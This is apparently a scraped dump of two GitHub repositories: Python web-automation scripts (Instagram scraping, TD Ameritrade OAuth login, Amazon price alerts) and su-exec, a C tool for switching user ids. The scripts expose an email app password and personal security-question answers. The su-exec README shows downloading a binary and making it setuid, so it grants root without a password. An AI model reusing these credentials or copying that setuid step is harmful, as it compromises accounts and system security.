self.driver.find_element_by_xpath('_8A5w5').click()\n likes = self.get_names()\n self.driver.find_element_by_class_name('_65Bje').click()\n print(likes)\n except NoSuchElementException as err:\n print('not enough activity on post')\n self.driver.find_element_by_xpath('/html/body/div[4]/div[2]/div/article/div[2]/section[2]/div/div[1]').click()\n continue\n i += 1\n\n def get_names(self):\n time.sleep(1)\n scroll_box = self.driver.find_element_by_xpath('/html/body/div[5]/div/div[2]')\n last_ht, ht = 0, 1\n while last_ht != ht:\n last_ht = ht\n time.sleep(1)\n ht = self.driver.execute_script(\"\"\"\n arguments[0].scrollTo(0, arguments[0].scrollHeight)\n return arguments[0].scrollHeight\"\"\", scroll_box)\n links = scroll_box.find_elements_by_tag_name('a')\n names = [name.text for name in links if name.text != '']\n self.driver.find_elements_by_xpath('Nm9Fw')[0].click()\n return names\n\n\nif __name__ == '__main__':\n ig_bot = Instabot('USERNAME', 'PASSWORD')\n time.sleep(3)\n ig_bot.nav_page('aurbataomememaker')\n ig_bot.get_names()\n print(Instabot.username)\n"
},
{
"alpha_fraction": 0.7187948226928711,
"alphanum_fraction": 0.7216642498970032,
"avg_line_length": 31.904762268066406,
"blob_id": "164b037451cf6cbc5aa11e73794e597fdc33d11f",
"content_id": "9d4afbd0b32fc6a176dcd870177177f7d6f60616",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 697,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 21,
"path": "/Social_media_automation/Track/data_anal.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import csv\nimport numpy\nimport os\n# takes data written to csv by insta_follow.py and opens it \nwith open('follow.csv', 'r') as csv_file:\n lines = csv_file.readlines()\nfollowing = []\nfollowers = []\n# appends data do lists\nfor line in lines:\n data = line.split(',')\n following.append(data[1])\n followers.append(data[2])\nprint(following)\nprint(followers)\n# shows user what followers are not following them back\nnot_following_back = [user for user in following if user not in followers]\nnot_following_back = [i for i in not_following_back if i]\nprint(not_following_back)\nprint(len(not_following_back))\nprint('It appears', len(not_following_back), 'users are not following you back')\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6378066539764404,
"alphanum_fraction": 0.6378066539764404,
"avg_line_length": 26.760000228881836,
"blob_id": "6343c0d9dda20c38b6cc40d7cf22c56e42d19677",
"content_id": "d9e349141b75759f6c06371fbff7ad04905aaded",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 693,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 25,
"path": "/Social_media_automation/Track/untitled.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import pandas as pd\ndef read_as_dataframe(file):\n df = pd.read_csv(file)\n print(df)\n return df\ndef visually_inspect(df):\n print(df.head())\n print(df.tail())\n print(df.column())\n print(df.shape())\n print(df.info())\n print(df.describe())\n print(df['major'].value_counts(dropna=False)\n print(df['median'].value_counts(dropna=False)\n print(df['unemployment'].value_counts(dropna=False)\ndef cleaning(df):\n df['major'] = df['major'].astype(str)\n df['median'] = df['median'].astype(int)\n df['unemployment'] = df['unemployment'].astype(int)\n return df\ndef main():\n df = read_as_dataframe(all_ages.csv)\n visually_inspect(df)\n cleaning(df)\nmain()"
},
{
"alpha_fraction": 0.6045314073562622,
"alphanum_fraction": 0.6120837330818176,
"avg_line_length": 33.67856979370117,
"blob_id": "a72f10ee80f70aa43dde825dd97c8557bd3729ce",
"content_id": "01890513c831d1bf37de684c0208e7571bba1ca3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2913,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 84,
"path": "/Social_media_automation/Track/following.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport time\nimport pandas as pd\n\n\nclass Instabot(object):\n username = None\n \"\"\"\n initializes an instance of the Instabot class.\n \n Call the login function to authenticate a user with IG\n \n Args:\n username:str: The instagram username for the user\n password:str: The instagram password for the user\n \n Attributes:\n driver.Selenium.webdriver.Chrome: The chromedriver that is used to automate browser activity\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.driver = webdriver.Chrome('../chromedriver80.exe')\n self.base_url = 'https://www.instagram.com'\n self.login()\n\n def login(self):\n self.driver.get('{}/accounts/login/'.format(self.base_url))\n username_element = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.NAME, \"username\")))\n username_element.send_keys(self.username)\n self.driver.find_element_by_name('password').send_keys(self.password)\n time.sleep(1)\n self.driver.find_elements_by_xpath(\"//div[contains(text(), 'Log In')]\")[0].click()\n\n def nav_page(self, page):\n self.driver.get('{}/{}/'.format(self.base_url, page))\n time.sleep(2)\n\n def get_following_data(self):\n timer = time.perf_counter()\n self.driver.find_element_by_xpath('//a[contains(@href, \"/following\")]').click()\n following = self.get_names()\n time.sleep(1)\n following_data = [user for user in following]\n n = []\n print(following_data)\n print(len(following_data))\n print(timer)\n df = pd.DataFrame.from_dict({'following': following_data, 'n': n},\n orient='index').T\n df.to_csv('follow.csv')\n print(df)\n\n def get_names(self):\n time.sleep(1)\n scroll_box = self.driver.find_element_by_class_name('isgrP')\n last_ht, ht = 0, 1\n while last_ht != ht:\n last_ht = ht\n time.sleep(1)\n ht = self.driver.execute_script(\"\"\"\n arguments[0].scrollTo(0, arguments[0].scrollHeight)\n return arguments[0].scrollHeight\"\"\", scroll_box)\n links = scroll_box.find_elements_by_tag_name('a')\n names = [name.text for name in links if name.text != '']\n self.driver.find_elements_by_xpath('/html/body/div[4]/div/div[1]/div/div[2]')[0].click()\n return names\n\n\nif __name__ == '__main__':\n ig_bot = Instabot('USERNAME', 'PASSWORD')\n time.sleep(3)\n ig_bot.nav_page('USERNAME')\n ig_bot.get_following_data()\n ig_bot.get_names()\n\n time.sleep(3)\n\n print(Instabot.username)\n"
},
{
"alpha_fraction": 0.5929012894630432,
"alphanum_fraction": 0.6033880114555359,
"avg_line_length": 37.340206146240234,
"blob_id": "6ea4108fd2c6f80821951780cf2db3ddad8cd3aa",
"content_id": "a94342b5eb823bb8043075e843e50648d9fb1179",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3719,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 97,
"path": "/TD-ameritrade_oauth/td_auth.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import requests\nimport time\nimport urllib\nfrom urllib import parse\nfrom splinter import Browser\nfrom variables import *\nimport os\n\n\nclass td_auth(object):\n def __init__(self, client_id, account_num, password):\n self.password = password\n self.client_id = client_id\n self.account_num = account_num\n self.access_code = None\n self.access_token = None\n\n def get_access_code(self, client_id):\n driver = {'chromedriver.exe'}\n browser = Browser('chrome', driver, headless=False)\n # define components of url\n method = 'GET'\n url = 'https://auth.tdameritrade.com/auth?'\n client_code = client_id + '@AMER.OAUTHAP'\n payload = {'response_type': 'code', 'redirect_uri': 'http://32.211.92.157', 'client_id': client_code}\n # build url\n my_url = requests.Request(method, url, params=payload).prepare()\n my_url = my_url.url\n browser.visit(my_url)\n # login\n payload = {'username0': user_id, 'password': password}\n browser.find_by_id('username0').first.fill(payload['username0'])\n time.sleep(1)\n browser.find_by_id('password').first.fill(payload['password'])\n time.sleep(1)\n browser.find_by_id('accept').first.click()\n time.sleep(1)\n browser.find_by_text(\"Can't get the text message?\").first.click()\n browser.find_by_value('Answer a security question').first.click()\n # answer security questions\n if browser.is_text_present('What was the name of your high school?'):\n browser.find_by_id('secretquestion0').first.fill('East Lyme High School')\n\n elif browser.is_text_present('What was your high school mascot?'):\n browser.find_by_id('secretquestion0').first.fill('The Vikings')\n\n elif browser.is_text_present('What was the name of your first pet?'):\n browser.find_by_id('secretquestion0').first.fill('Cody')\n elif browser.is_text_present(\n 'What was the name of the town your grandmother lived in? (Enter full name of town only.)'):\n browser.find_by_id('secretquestion0').first.fill('Scranton')\n browser.find_by_id('accept').first.click()\n time.sleep(1)\n browser.find_by_id('accept').first.click()\n # parse url\n time.sleep(1)\n new_url = browser.url\n access_code = urllib.parse.unquote(new_url.split('code=')[1])\n # close browser\n browser.quit()\n self.access_code = access_code\n print('access_code:', access_code)\n\n return access_code\n\n def get_access_token(self):\n # define endpoint\n url = r'https://api.tdameritrade.com/v1/oauth2/token'\n headers = {'Context-Type': 'application/x-www-form-urlencoded'}\n payload = {'grant_type': 'authorization_code',\n 'access_type': 'offline',\n 'code': self.access_code,\n 'client_id': client_id,\n 'redirect_uri': 'http://32.211.92.157'}\n # post data for token\n authreply = requests.post(url, headers=headers, data=payload)\n # convert json-dict\n decoded_content = authreply.json()\n print(decoded_content)\n\n access_token = decoded_content['access_token']\n os.environ['td_token'] = str(access_token)\n self.access_token = access_token\n\n return access_token\n\n def authenticate(self):\n try:\n self.access_token = os.environ['td_token']\n except KeyError:\n self.get_access_code(client_id)\n self.get_access_token()\n\n\nif __name__ == '__main__':\n td_auth = td_auth(client_id, account_num, password)\n td_auth.authenticate()\n"
},
{
"alpha_fraction": 0.6552901268005371,
"alphanum_fraction": 0.658703088760376,
"avg_line_length": 17.3125,
"blob_id": "1b262f155e515d6ffce6141d76618c8f26dc5d76",
"content_id": "0f18d09d26999ab4fbb518fecd2bb0abbb357694",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 293,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 16,
"path": "/Social_media_automation/Track/anal_test.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import multiprocessing\nfrom multiprocessing import Pool\nimport os\nimport sys\n\n\ndef run_file(filename):\n os.system('{} {}'.format(sys.executable, filename))\n\n\nfilenames = ['following.py', 'followers.py']\n\n\nif __name__ == '__main__':\n with Pool(2) as p:\n p.map(run_file, filenames)\n"
},
{
"alpha_fraction": 0.8148148059844971,
"alphanum_fraction": 0.8148148059844971,
"avg_line_length": 133,
"blob_id": "468c803c7003be75c2868692679ddfffeff547ed",
"content_id": "a000154937b7d9325fe72ed426b3eab4e2294ba3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 1,
"path": "/README.md",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "All contents of this repository are to show skills developed in web automation and web scraping for data to use in personal projects.\r\n"
},
{
"alpha_fraction": 0.6063968539237976,
"alphanum_fraction": 0.6586161851882935,
"avg_line_length": 28.461538314819336,
"blob_id": "dd81dd0fef7003f746848a1219f018d8fb6a4842",
"content_id": "c9318628ef10c4f9b431a7b6772eed689b4334db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1532,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 52,
"path": "/Simple_amazon_web_scraper/amzn_scrape.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time\nurl = 'https://www.amazon.com/Upgrade-3500Lumens-Projector-Supported-Smartphone/dp/B07YBRGLGW/ref=sr_1_9?crid' \\\n '=3LWI7WTR8IQGH&keywords=projector&qid=1578782732&sprefix=projector%2Caps%2C212&sr=8-9 '\n\nheaders = {\"user-agent\": 'YOUR USER AGENT (can be found with google search)'\n }\n\n\ndef check_price():\n page = requests.get(url, headers=headers)\n\n soup1 = BeautifulSoup(page.content, 'html.parser')\n soup2 = BeautifulSoup(soup1.prettify(), 'html.parser')\n\n price = soup2.find(id=\"priceblock_ourprice\").get_text()\n title = soup2.find(id=\"title\").get_text()\n converted_price = float(price[1:6])\n\n if (converted_price < 59.99):\n send_mail()\n print(converted_price)\n print(title.strip())\n\n if (converted_price < 59.99):\n send_mail()\n\n\ndef send_mail():\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n server.login('[email protected]', 'cuglpbvcqdnzjefk')\n subject = 'Price has dropped!'\n body = 'Check the link: https://www.amazon.com/Upgrade-3500Lumens-Projector-Supported-Smartphone/dp/B07YBRGLGW/ref=sr_1_9?crid' \\\n '=3LWI7WTR8IQGH&keywords=projector&qid=1578782732&sprefix=projector%2Caps%2C212&sr=8-9 '\n msg = f\"Subject: {subject}\\n\\n{body}\"\n server.sendmail(\n '[email protected]',\n '[email protected]',\n msg\n )\n print('EMAIL HAS BEEN SENT')\n server.quit()\n\nwhile (True):\n check_price()\n time.sleep(86400)\n"
}
] | 10 |
NobodyXu/su-any-exec
|
https://github.com/NobodyXu/su-any-exec
|
614831fa3c643e13918e0a9b510ed2fd4680171b
|
1fbdd4c0b54ee8739aa9731a74260ef5d2321b97
|
e5c3a5345b556edbfc5de39106217d386d6d8ee9
|
refs/heads/master
| 2021-01-02T03:32:34.059393 | 2020-03-05T05:41:21 | 2020-03-05T05:41:21 | 239,472,173 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6877275109291077,
"alphanum_fraction": 0.7152886390686035,
"avg_line_length": 34.94392395019531,
"blob_id": "06f3b6d20a518da1bf877eb8e5da8c41f03149b9",
"content_id": "8c6e6180e82f37fb4c1603f375905b44cd509993",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3846,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 107,
"path": "/README.md",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "# su-exec\nswitch user and group id and exec without passwd, can be used to replace sudo when building container.\n\n## Purpose\n\nThis is a simple tool that will simply execute a program with different\nprivileges. The program will be exceuted directly and not run as a child,\nlike su and sudo does, which avoids TTY and signal issues (see below).\n\nNotice that su-exec depends on being run by the root user, non-root\nusers do not have permission to change uid/gid, or you need to setuid on it.\n\n## Usage\n\n```shell\nsu-exec user-spec command [ arguments... ]\n```\n\n`user-spec` is either a user name (e.g. `nobody`) or user name and group\nname separated with colon (e.g. `nobody:ftp`). Numeric uid/gid values\ncan be used instead of names. Example:\n\n```shell\n$ su-exec apache:1000 /usr/sbin/httpd -f /opt/www/httpd.conf\n```\n\n### Replace `sudo`\n\nIf you compile softwares in a container, you probably need `sudo`, since compiling with root may not be\na good idea and some `Makefile` like `lede` even forbidden building as root.\n\nHowever, `sudo` is such a overkill for unattented auto-build of a container since\n - It requires dependencies to be installed.\n - You need to configure `sudo` to allow password-less `sudo` for your user\n - You cannot run `sudo apt-get remove -y sudo` to uninstall, you have to somewhat switch to root user without `sudo`\n to uninstall it.\n\nSo how to replace `sudo` with `su-exec` for containers? Simple, just execute the following lines with `root`:\n\n\n - `14.5kb` when building using `glibc2.3`, `clang-9.0.0-2` and `lld-9.0.0` \n - `14.0kb` when building using `musl-1.2.0`, `clang-9.0.0-2` and `lld-9.0.0`.\n - `53.3kb` when still using the above toolchain, but instead built with `-static`.\n\n```\ncd /usr/local/bin/\n\n# For dynamic-linked glibc, 14.5kb\nwget https://github.com/NobodyXu/su-exec/releases/download/v0.3.1/su-exec\n\n# For dynamic-linked musl-libc, 14.0kb\nwget https://github.com/NobodyXu/su-exec/releases/download/v0.3.1/su-exec-musl\n\n# For static-linked musl-libc, 53.3kb\nwget https://github.com/NobodyXu/su-exec/releases/download/v0.3.1/su-exec-static-musl\n\nchmod a+xs su-exec\n```\n\nRemoving `su-exec` is pretty simple:\n\n```\nsu-exec root:root rm /usr/local/bin/su-exec\n```\n\n## TTY & parent/child handling\n\nNotice how `su` will make `ps` be a child of a shell while `su-exec`\njust executes `ps` directly.\n\n```shell\n$ docker run -it --rm alpine:edge su postgres -c 'ps aux'\nPID USER TIME COMMAND\n 1 postgres 0:00 ash -c ps aux\n 12 postgres 0:00 ps aux\n$ docker run -it --rm -v $PWD/su-exec:/sbin/su-exec:ro alpine:edge su-exec postgres ps aux\nPID USER TIME COMMAND\n 1 postgres 0:00 ps aux\n```\n\n## Possible Vulnerabilities\n\n - `su-exec` is not like `sudo` but more like `su`, it does not modify any environment variables other than `HOME`, `USER`, `LOGNAME`, which \n might be undesirable. To workaround, use `su-exec env var=val command arg`.\n\n### Vulnerabilities that does not affect container\n\n - Due to the fact that `su-exec` does not allocate new tty, it is vulnerable to [TTY hijacking and arbitrary code execution][1].\n An easy workaround will be to `chmod 600 /dev/tty`, but to ensure the change is persistent, you need to modify udev rule.\n\n## Why reinvent gosu?\n\nThis does more or less exactly the same thing as [gosu](https://github.com/tianon/gosu)\nbut it is only\n\n - `14.3kb` when building using `glibc2.3`, `clang-9.0.0-2` and `lld-9.0.0` \n - `13.9kb` when building using `musl-1.2.0`, `clang-9.0.0-2` and `lld-9.0.0`.\n - `45.6kb` when still using the above toolchain, but instead built with `-static`.\n\ninstead of `1.7MB`, which is running `gosu 1.10.1` from `apt`.\nBoth are installed on `Intel x86-64` platform.\n\n[1]: https://ruderich.org/simon/notes/su-sudo-from-root-tty-hijacking\n\n## Testing\n\nRun `docker build .` where `docker` can be replace by `podman`, or `buildah`.\n"
},
{
"alpha_fraction": 0.38165295124053955,
"alphanum_fraction": 0.4539160430431366,
"avg_line_length": 33.49253845214844,
"blob_id": "c0b2e97bf210c871d6e25e55b9472b465c1dffdf",
"content_id": "73d50d82d202e90ce231420b9c15ecb75f16753f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2311,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 67,
"path": "/test_exe.py",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\nimport os\nimport sys\nimport subprocess\n\ndef run(command, **kwargs):\n print(\"Running\", command)\n return subprocess.run(command, **kwargs)\n\n#def usage_test(exe, test):\n# stderr = run([exe], stderr = subprocess.PIPE, text = True, check = True).stderr\n# usage = \"{}: Usage: {} user-spec command [args]\".format(os.path.basename(exe), exe)\n# if stderr != usage:\n# raise AssertionError(\"stderr '{}' != usage '{}'\".format(stderr, usage))\n\ndef spec_test(exe, test):\n for spec in test[\"specs\"]:\n run([exe, spec, \"./Assert.py\"] + test[\"asserted\"], check = True)\n\ntests = [\n {\n \"specs\": [\"\", \":\", \"0\", \"root\", \"0:\", \"root:\", \":0\", \":root\", \"root:root\", \"root:0\", \"0:root\"],\n \"asserted\": [\"0\", \"0\", \"[0]\", \"root\", \"root\", \"/root\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"test1\", \"1000\"],\n \"asserted\": [\"1000\", \"1000\", \"[1000, 1002]\", \"test1\", \"test1\", \"/home/test1\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"1000:1000\", \"test1:1000\", \"1000:test1\", \"test1:test1\"],\n \"asserted\": [\"1000\", \"1000\", \"[1000]\", \"test1\", \"test1\", \"/home/test1\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"test2\", \"test2:test2\", \"1001:1001\", \"test2:1001\", \"1001:test2\"],\n \"asserted\": [\"1001\", \"1001\", \"[1001]\", \"test2\", \"test2\", \"/home/test2\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"test1:test2\", \"1000:1001\"],\n \"asserted\": [\"1000\", \"1001\", \"[1001]\", \"test1\", \"test1\", \"/home/test1\"],\n \"func\": spec_test\n },\n {\n \"specs\": [\"10293:29304\"],\n \"asserted\": [\"10293\", \"29304\", \"[29304]\", \"10293\", \"10293\", \"/\"],\n \"func\": spec_test\n }\n ]\n\ndef main():\n for exe in sys.argv[1 : ]:\n for test in tests:\n test[\"func\"](exe, test)\n\nif __name__ == \"__main__\":\n try:\n main()\n except AssertionError as e:\n print(\"AssertionError:\", e)\n sys.exit(1)\n except subprocess.CalledProcessError as e:\n print(\"subprocess.CalledProcessError\", e)\n sys.exit(1)\n"
},
{
"alpha_fraction": 0.5463215112686157,
"alphanum_fraction": 0.5735694766044617,
"avg_line_length": 26.185184478759766,
"blob_id": "8615f8b7ab6d958c107df2ad4019ab2eb45b0def",
"content_id": "d5559469990f06a8816cf0c1c13f0628bba13c22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 734,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 27,
"path": "/Assert.py",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\nimport sys\nimport os\n\ndef assertEqual(expr1, expr2):\n result1 = eval(expr1)\n result2 = eval(expr2)\n if result1 != result2:\n msg = \"{} '{}' != {} '{}'\".format(expr1, result1, expr2, result2)\n raise AssertionError(msg)\n\ndef main():\n assertEqual(\"int(sys.argv[1])\", \"os.getuid()\")\n assertEqual(\"int(sys.argv[2])\", \"os.getgid()\")\n assertEqual(\"sys.argv[3]\", \"str(os.getgroups())\")\n \n assertEqual(\"sys.argv[4]\", \"os.getenv('USER')\")\n assertEqual(\"sys.argv[5]\", \"os.getenv('LOGNAME')\")\n assertEqual(\"sys.argv[6]\", \"os.getenv('HOME')\")\n\nif __name__ == \"__main__\":\n try:\n main()\n except AssertionError as e:\n print(\"AssertionError:\", e)\n sys.exit(1)\n"
},
{
"alpha_fraction": 0.6872549057006836,
"alphanum_fraction": 0.6931372284889221,
"avg_line_length": 29,
"blob_id": "27857ade6c1e2ea63b35f5aa8d005f5787c837a5",
"content_id": "8368dece8ae98062f5b400353c2e2988156f205c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1020,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 34,
"path": "/Dockerfile",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "FROM nobodyxu/apt-fast:latest-debian-buster-slim AS apt-fast\n\nFROM nobodyxu/musl-libc:latest-debian-buster-slim AS base\nCOPY --from=apt-fast /usr/local/ /usr/local/\n\n# Prepare Environment\n## Install dependencies\nRUN apt-auto install -y --no-install-recommends \\\n clang lld llvm make python3\n\n## Configure llvm as default toolchain\n### Use ld.ldd as default linker\nRUN ln -f $(which ld.lld) /usr/bin/ld\n\n## For testing su-exec-*\nRUN useradd -m test1 && useradd -m test2\nRUN groupadd group1 && addgroup test1 group1\n\nRUN /usr/local/sbin/rm_apt-fast.sh\n\n## Build su-exec*\nADD * /usr/local/src/su-exec/\nWORKDIR /usr/local/src/su-exec/\n\n# Build only dynamic-version for glibc as static version is buggy\nRUN CC=clang make su-exec -j $(nproc) && \\\n mv su-exec /usr/local/sbin/\n\nRUN CC=musl-clang make su-exec su-exec-static -j $(nproc) && \\\n mv su-exec /usr/local/sbin/su-exec-musl && \\\n mv su-exec-static /usr/local/sbin/su-exec-musl-static\n\n# Test\nRUN ./test_exe.py /usr/local/sbin/*\n"
},
{
"alpha_fraction": 0.555343508720398,
"alphanum_fraction": 0.5687022805213928,
"avg_line_length": 31.6875,
"blob_id": "fee00637a3ff78c86d43047c43b9156acc90a48f",
"content_id": "44ac7c30b4acdcd244536fc21d05165261a65ce7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 524,
"license_type": "permissive",
"max_line_length": 163,
"num_lines": 16,
"path": "/Makefile",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "\nCFLAGS ?= -Wall -Werror -std=gnu11 $(shell echo 'int main(int argc, char* argv[]) { return 0; }' | $(CC) -x c -Oz - >/dev/null 2>&1 && echo -Oz || echo -Os) -flto \nLDFLAGS ?= -fvisibility=hidden -Wl,--plugin-opt=O3 -Wl,--icf=all -Wl,-O2 -Wl,--discard-all -Wl,--strip-all -Wl,--as-needed -Wl,--gc-sections\n\nPROG := su-exec\nSRCS := $(PROG).c\n\nall: $(PROG)\n\n$(PROG): $(SRCS)\n\t$(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS)\n\n$(PROG)-static: $(SRCS)\n\t$(CC) $(CFLAGS) -o $@ $^ -static $(LDFLAGS)\n\nclean:\n\trm -f $(PROG) $(PROG)-static a.out\n"
},
{
"alpha_fraction": 0.49288254976272583,
"alphanum_fraction": 0.5077105760574341,
"avg_line_length": 21.1842098236084,
"blob_id": "6970e7da9323c999228f2d88175568b19b9dd4a6",
"content_id": "ac5a0b89fc0e2206cac2afdeb4395d6aa0747a9e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3372,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 152,
"path": "/su-exec.c",
"repo_name": "NobodyXu/su-any-exec",
"src_encoding": "UTF-8",
"text": "/* set user and group id and exec */\n\n#include <stdnoreturn.h>\n#include <sys/types.h>\n\n#include <err.h>\n#include <grp.h>\n#include <pwd.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nstatic void parse_userspec(char *argv1, const char **user_p, const char **group_p)\n{\n char *user = argv1;\n char *group = strchr(user, ':');\n if (group)\n *group++ = '\\0';\n\n *user_p = user;\n *group_p = group;\n}\n\n/**\n * user != NULL, pw_p != NULL\n */\nstatic uid_t parse_user(const char *user, struct passwd **pw_p)\n{\n char *end;\n uid_t nuid = strtol(user, &end, 10);\n\n if (*end == '\\0') {\n *pw_p = getpwuid(nuid);\n return nuid;\n } else {\n *pw_p = getpwnam(user);\n if (*pw_p == NULL)\n err(1, \"getpwnam(%s)\", user);\n return (*pw_p)->pw_uid;\n }\n}\n\n/**\n * group != NULL\n */\nstatic gid_t parse_group(const char *group)\n{\n char *end;\n gid_t ngid = strtol(group, &end, 10);\n\n if (*end == '\\0')\n return ngid;\n else {\n struct group *gr = getgrnam(group);\n if (gr == NULL)\n err(1, \"getgrnam(%s)\", group);\n return gr->gr_gid;\n }\n}\n\n/**\n * user != NULL, glist_p != NULL\n *\n * After the call, *glist_p will point to heap memory,\n * and this call will return the number of elements in it.\n */\nint Getgrouplist(const char *user, gid_t gid, gid_t **glist_p)\n{\n int ngroups = 0;\n gid_t *glist = NULL;\n\n while (1) {\n int ret = getgrouplist(user, gid, glist, &ngroups);\n\n if (ret >= 0) {\n *glist_p = glist;\n return ngroups;\n }\n\n glist = realloc(glist, ngroups * sizeof(gid_t));\n if (glist == NULL)\n err(1, \"malloc\");\n }\n}\n\nint main(int argc, char *argv[])\n{\n if (argc < 3)\n errx(0, \"Usage: %s user-spec command [args]\", argv[0]);\n\n const char *user, *group;\n\n parse_userspec(argv[1], &user, &group);\n \n uid_t uid;\n struct passwd *pw = NULL;\n if (user[0] != '\\0')\n uid = parse_user(user, &pw);\n else {\n uid = getuid();\n pw = getpwuid(uid);\n }\n\n setenv(\"HOME\", pw != NULL ? pw->pw_dir : \"/\", 1);\n \n if (pw != NULL) {\n setenv(\"USER\", pw->pw_name, 1);\n setenv(\"LOGNAME\", pw->pw_name, 1);\n } else {\n char buffer[20]; // 20 is enough for a unsigned 64-bit integer\n snprintf((char*) &buffer, 20, \"%llu\", (unsigned long long) uid);\n\n setenv(\"USER\", (const char*) &buffer, 1);\n setenv(\"LOGNAME\", (const char*) &buffer, 1);\n }\n\n gid_t gid;\n if (group && group[0] != '\\0') {\n /* group was specified, ignore grouplist for setgroups later */\n pw = NULL;\n gid = parse_group(group);\n } else if (pw != NULL)\n gid = pw->pw_gid;\n else\n gid = getgid();\n\n if (pw == NULL) {\n if (setgroups(1, &gid) < 0)\n err(1, \"setgroups(%llu)\", (unsigned long long) gid);\n } else {\n gid_t *glist;\n int ngroups = Getgrouplist(pw->pw_name, gid, &glist);\n\n if (setgroups(ngroups, glist) < 0)\n err(1, \"setgroups\");\n\n free(glist);\n }\n\n if (setgid(gid) < 0)\n err(1, \"setgid(%i)\", gid);\n\n if (setuid(uid) < 0)\n err(1, \"setuid(%i)\", uid);\n\n char **cmdargv = &argv[2];\n execvp(cmdargv[0], cmdargv);\n err(1, \"%s\", cmdargv[0]);\n\n return 1;\n}\n"
}
] | 6 |
rbrown540/Final-Cloud-Project
|
https://github.com/rbrown540/Final-Cloud-Project
|
448ca4c666c88af19035d1aa19f4350a117c6dab
|
c2ef6062a685fe9cb98afd65581763c5ade1e24e
|
585f1fbd2d7c4861a9dd3078cad2c627c5e786d2
|
refs/heads/main
| 2023-03-12T18:04:23.495572 | 2021-02-19T15:41:51 | 2021-02-19T15:41:51 | 340,074,795 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7631579041481018,
"alphanum_fraction": 0.7894737124443054,
"avg_line_length": 18,
"blob_id": "3ed0d62e9864690af1675efaca6d619170e98ee6",
"content_id": "bd5e9d0c9936448584c79007d782bc44e945c833",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 38,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/README.md",
"repo_name": "rbrown540/Final-Cloud-Project",
"src_encoding": "UTF-8",
"text": "# Final-Cloud-Project\ndynamoDB and S3\n"
},
{
"alpha_fraction": 0.3415597379207611,
"alphanum_fraction": 0.4057255685329437,
"avg_line_length": 22.045454025268555,
"blob_id": "5e13640a4f7e4a33aaced2958ff6728723d69b6f",
"content_id": "9ff59d59de2bbdc08213ae40f26a42a6135a5b9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1013,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 44,
"path": "/group_schedule.py",
